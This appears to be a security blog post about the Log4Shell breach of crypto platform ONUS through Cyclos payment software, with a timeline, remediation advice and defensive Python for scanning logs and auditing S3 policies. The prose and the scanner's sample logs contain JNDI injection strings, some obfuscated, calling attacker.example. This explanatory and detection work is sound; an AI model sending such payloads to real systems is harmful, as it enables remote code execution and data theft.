LOG4J Attack on Cryptocurrency Firm ONUS

Romeion Case
Feb 1, 2022

ONUS, one of Vietnam’s largest cryptocurrency platforms, has, according to multiple reports, been the victim of a data-theft and extortion attack that was traced to the Log4Shell remote code execution vulnerability in Apache Log4j (CVE-2021-44228), exploited through a third-party payment application.

CyStack, a security firm that partners with ONUS and was involved in the investigation, said that the incident started with the Log4Shell vulnerability in ONUS’s payment software, which is provided by Cyclos.

The vulnerability was first disclosed publicly on Dec. 9, 2021, and sent security teams into a frenzy trying to identify vulnerable systems and install the patches that have since been released on a semi-regular basis (Log4j 2.0-beta9 through 2.14.1 are affected; 2.15.0 was the first fix, followed by 2.16.0, 2.17.0 and 2.17.1 for related issues).

How does it work?

So for the uninitiated, Log4j is an open-source Java logging library maintained by the Apache Software Foundation. Applications use it to record events (errors and routine system operations) and to communicate diagnostic messages about them to system administrators and users.

Consider this scenario. Your friend sends you a link to a website advertising discounts, only the link is dead, so when you try to visit the page you get an ‘error 404’, indicating that the page could not be found. This is the result of your request reaching a web server, and that web server sending a message back that the page you are trying to reach does not exist. While this is going on, the server is also writing a log entry, using Log4j, that the server’s system administrators can read at a later date. That log entry usually includes data the client chose, such as the requested path and the User-Agent header. Log4Shell exists because vulnerable Log4j versions (2.0-beta9 through 2.14.1) scan the logged message for lookup expressions of the form ${...} and evaluate them, including JNDI lookups such as ${jndi:ldap://attacker.example/x}. If an attacker can get such a string into any field that ends up in a log, the server connects to the attacker’s LDAP (or RMI) server and can be made to load and execute attacker-supplied code, which is how a dead-link 404 can turn into remote code execution.
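As an added example (this is not code from the original article, from CyStack or from Cyclos), the following Python scans constructed sample access-log lines for Log4Shell probes. It also undoes the nested-lookup obfuscation attackers used to hide the jndi keyword (${lower:j}, ${upper:n} and the ${::-j} default-value trick), which is the same substitution behaviour that made Log4j exploitable in the first place. The log lines, the timestamps and the attacker.example host are constructed for illustration.

```python
import re

# Constructed sample access-log lines for illustration (not real ONUS or
# Cyclos logs). Line 0 is benign; lines 1-3 carry a Log4Shell probe in the
# User-Agent field, the last two obfuscated with nested Log4j lookups.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [11/Dec/2021:10:03:12 +0700] "GET /api/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:04:01 +0700] "GET /login HTTP/1.1" 404 0 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:04:07 +0700] "GET /login HTTP/1.1" 404 0 "-" '
    '"${${lower:j}${upper:n}di:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - [11/Dec/2021:10:04:15 +0700] "GET /login HTTP/1.1" 404 0 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
]

# Innermost ${...} expression: a body containing no nested "${" or "}".
_INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A JNDI lookup once obfuscation is removed: ${jndi:<scheme>://<host>...}
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s:]+)", re.IGNORECASE)


def _resolve_lookup(body: str) -> str:
    """Emulate the few Log4j lookups attackers use to disguise 'jndi'.

    ${x:-default} (including the bare ${::-j} form) yields the default value;
    ${lower:X} and ${upper:X} change case. Any other lookup is left intact so
    the outer expression survives for matching.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, _, arg = body.partition(":")
    if name.lower() == "lower":
        return arg.lower()
    if name.lower() == "upper":
        return arg.upper()
    return "${" + body + "}"


def deobfuscate_lookups(text: str, max_rounds: int = 10) -> str:
    """Resolve nested lookups inside-out, bounded to avoid pathological input."""
    for _ in range(max_rounds):
        resolved = _INNERMOST_LOOKUP.sub(lambda m: _resolve_lookup(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def scan_for_log4shell(lines):
    """Return one finding per log line that carries a JNDI lookup."""
    findings = []
    for idx, raw in enumerate(lines):
        cleaned = deobfuscate_lookups(raw)
        match = _JNDI_LOOKUP.search(cleaned)
        if match:
            findings.append({
                "line": idx,
                "scheme": match.group(1).lower(),
                "host": match.group(2),
                "decoded": match.group(0),
                "raw": raw,
            })
    return findings


if __name__ == "__main__":
    for f in scan_for_log4shell(SAMPLE_LOG_LINES):
        print(f"line {f['line']}: {f['scheme']}://{f['host']}  <- {f['decoded']}")
```

A scanner like this is a retrospective hunt, not a fix: it tells you which hosts were probed and which callback servers to block, but only patching (or removing the JndiLookup class) stops the lookup from being evaluated. A production version would also decode URL-encoding and base64 in the request fields before matching, since attackers layered those on top of the lookup tricks shown here.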

What Happened with ONUS?

In the case of ONUS, as noted above, the initial foothold was the Log4Shell vulnerability in the Cyclos software used to handle payments. The attackers were then able to escalate because of misconfigured permissions on AWS S3 (Amazon Web Services Simple Storage Service), Amazon’s object storage offering. The AWS access key that the attackers obtained from the compromised server had been granted full S3 access, which allowed them to read and then easily delete all of the S3 buckets.

According to CyStack, the servers were also running a script that periodically backed up the database to AWS S3; the script and its backups exposed the database hostname, the database username and password, and the SQL dump files themselves. This meant that the attackers were able to reach the ONUS database and pull user information. They took full advantage and exfiltrated the data of some 2 million ONUS users, including names, email addresses, phone numbers, addresses, e-KYC (electronic Know Your Customer) data, hashed passwords, transaction history and other unspecified ‘encrypted information.’

The threat actors took advantage of a vulnerability in a set of libraries in the ONUS system to get into the sandbox server (a development and testing environment, not production). However, because of the permission configuration error, this server contained credentials that gave them access to the data storage system.

Attack Timeline according to CyStack

09/12/2021 — the Log4Shell vulnerability was published. At that time, ONUS was carefully monitoring its system security but did not know that Cyclos was among the software affected by the Log4Shell vulnerability.

11–13/12/2021 — the attackers exploited the Log4Shell vulnerability on a Cyclos server of ONUS and left a backdoor behind.

14/12/2021 — Cyclos notified ONUS of the vulnerability and issued instructions to patch the vulnerability. ONUS immediately patched the vulnerability according to those instructions.

23/12/2021 — while monitoring the system, CyStack detected some abnormal activities and informed ONUS. When ONUS confirmed that the user data in AWS S3 had been deleted, CyStack immediately enacted incident response protocols, and the keys were deactivated shortly after.

24/12/2021 — the attackers sent a ransom request of $5M USD to ONUS via Telegram. ONUS rejected the request and disclosed the attack to its users. CyStack confirmed that the Log4Shell vulnerability in Cyclos was the root cause and started checking all Cyclos nodes to find and remove backdoors.

25/12/2021 — the attackers posted about the leak on a hacking forum and claimed to have copies of the ONUS database.

Remediation?

In order to improve their security and mitigate the effects of the exploited vulnerability, CyStack recommended the following actions to ONUS:

  1. Patching the Log4Shell vulnerability in Cyclos per the instructions from the vendor.
  2. Deactivating all the leaked credentials.
  3. Granting permissions properly to AWS keys that can access AWS S3 buckets and other services.
  4. Blocking public access to all sensitive S3 buckets and requiring tokens to access certain objects.

Lessons Learned?

One of the most egregious mistakes ONUS made was granting full Amazon S3 access to the access key, which the attackers then used to read and delete the buckets at will.
From a cybersecurity perspective, you always want to approach permissions with the ‘principle of least privilege’ in mind: grant only the minimum access that a person, service or access key needs to do its job. A backup job, for example, needs to write new objects into one bucket; it does not need to list, read or delete every bucket in the account.
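To make the least-privilege point concrete, and to show the kind of ‘full access’ grant described under “What Happened with ONUS?” beside a scoped alternative, here is an added Python example (not from the original article, CyStack, ONUS or AWS) that audits an IAM policy document for over-broad S3 permissions. Both policies and the example-db-backups bucket name are constructed and hypothetical; the audit uses IAM’s wildcard semantics for action names but deliberately ignores Deny statements and Conditions, so it errs on the side of reporting.

```python
from fnmatch import fnmatchcase

# Constructed, hypothetical policies for illustration; neither is ONUS's
# actual IAM configuration. The first reproduces the kind of "full access"
# grant the article describes; the second is all a backup job needs.
FULL_S3_ACCESS_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}],
}

BACKUP_WRITER_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:PutObject"],
            # Hypothetical bucket name; only new objects under one prefix.
            "Resource": "arn:aws:s3:::example-db-backups/nightly/*",
        }
    ],
}

# Operations that let a stolen key destroy or expose data outright.
DESTRUCTIVE_S3_ACTIONS = (
    "s3:DeleteBucket",
    "s3:DeleteBucketPolicy",
    "s3:DeleteObject",
    "s3:DeleteObjectVersion",
    "s3:PutBucketPolicy",
    "s3:PutBucketAcl",
    "s3:PutObjectAcl",
)


def _as_list(value):
    """IAM allows a bare string or a list for Action, Resource and Statement."""
    return value if isinstance(value, list) else [value]


def _grants(pattern: str, action: str) -> bool:
    """IAM action matching: case-insensitive, with '*' and '?' wildcards."""
    return fnmatchcase(action.lower(), pattern.lower())


def audit_s3_policy(policy: dict):
    """Return (code, statement_index, message) findings for over-broad S3 grants.

    Only Allow statements are examined. Deny statements and Conditions are
    ignored, so a real policy may be tighter than this audit reports.
    """
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        if "NotAction" in stmt:
            findings.append(("NOT_ACTION", idx,
                             "Allow with NotAction grants everything not listed; review manually"))
            continue
        actions = [str(a) for a in _as_list(stmt.get("Action", []))]
        resources = [str(r) for r in _as_list(stmt.get("Resource", []))]

        for pattern in actions:
            if pattern in ("*", "s3:*"):
                findings.append(("FULL_ACCESS", idx,
                                 f"{pattern!r} grants every S3 operation, including bucket deletion"))
            else:
                hits = [a for a in DESTRUCTIVE_S3_ACTIONS if _grants(pattern, a)]
                if hits:
                    findings.append(("DESTRUCTIVE", idx, f"{pattern!r} grants {', '.join(hits)}"))

        touches_s3 = any(p == "*" or p.lower().startswith("s3:") for p in actions)
        if touches_s3 and any(r in ("*", "arn:aws:s3:::*") for r in resources):
            findings.append(("WILDCARD_RESOURCE", idx,
                             "S3 actions allowed on every bucket; scope Resource to specific ARNs"))
    return findings


if __name__ == "__main__":
    for name, policy in (("full-access key", FULL_S3_ACCESS_POLICY),
                         ("backup writer", BACKUP_WRITER_POLICY)):
        print(f"{name}: {audit_s3_policy(policy) or 'no findings'}")
```

Scoping the key to s3:PutObject on one prefix means that even a key lifted from a compromised server cannot list, read or delete existing backups. Pair that with bucket versioning or Object Lock (so an attacker who does obtain a broader key cannot silently erase history) and keep the database credentials out of the backup script altogether, for example by running the job under an instance role and reading the password from a secrets store, since it was the credentials sitting beside the backups that turned a bucket deletion into a full database exfiltration here.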

When granting permissions, it is not enough to verify who has access; it is equally important to control what they have access to, and to segment sensitive data (database credentials, backups, KYC records) from data that is meant to be publicly accessible.

Finally, the usual advice about patching applies only partly here, because the attackers exploited the vulnerability within days of its publication and before the vendor had issued guidance, but security teams should still apply vendor patches as soon as they are released. Just as important is keeping an inventory of third-party software and the libraries it bundles: ONUS did not know that Cyclos was affected by Log4Shell, so it could not have known to look for a patch. Both steps reduce the attack surface and make the organization a less attractive target.

Romeion Case

I am a cybersecurity professional, seeking to use my knowledge and experience to help make the world a much safer place.